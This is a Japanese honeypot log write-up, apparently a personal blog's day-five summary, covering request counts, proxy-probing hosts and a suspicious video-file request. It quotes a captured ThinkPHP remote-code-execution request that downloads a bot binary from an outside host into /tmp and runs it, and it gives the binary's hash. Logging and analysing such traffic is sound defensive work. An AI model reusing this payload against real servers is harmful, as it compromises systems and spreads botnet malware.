honeypotの簡易解析5日目

■2019-04-05のアクセス数は68件でした。

■送信元IPアドレスの数は 46件です。

■メソッドの種別は以下です。

GET・・64件
PUT・・0件
POST・・0件
HEAD・・1件
CONNECT・・3件
PROFFIND・・0件
その他・・0件

気になるlog

不正中継調査の通信

4日振りに観測。前回と同じhostでどのlogも9:30だった。調査するサービスでもあるのだろうか。

www.123cha.com、www.baidu.com、cn.bing.com、www.ip.cn、api.ipify.org

46件目。m3u8って動画ファイルだそう。動画泥棒の偵察とかかな?

[2019-04-05 10:27:34+0900] 122.228.19.80 ほげ:80 "GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1" 200 False 
GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1
Host: ほげ:80
ache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,fr;q=0.7
Cookie: __cfduid=df196e929b0113f0ecbe95f35e04588001551851468
Connection: close

59件目。ThinkPHP脆弱性からのダウンロード!

[2019-04-05 17:21:36+0900] 220.130.240.96 127.0.0.1:80 "GET /index.php?
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1
Host: 127.0.0.1
User-Agent: WOW
Accept: */*
Accept-Language: en-US,en;q=0.8
Connection: Keep-Alive

すっかり常連となった。ThinkPHP脆弱性への攻撃、miraiっぽいファイルをダウンロードさせている。

b2128d9757426f114b3ca718a6ad1c5850381077666ffb05703da95e20604b0b

virustotalはこちら

sandboxの結果はこちら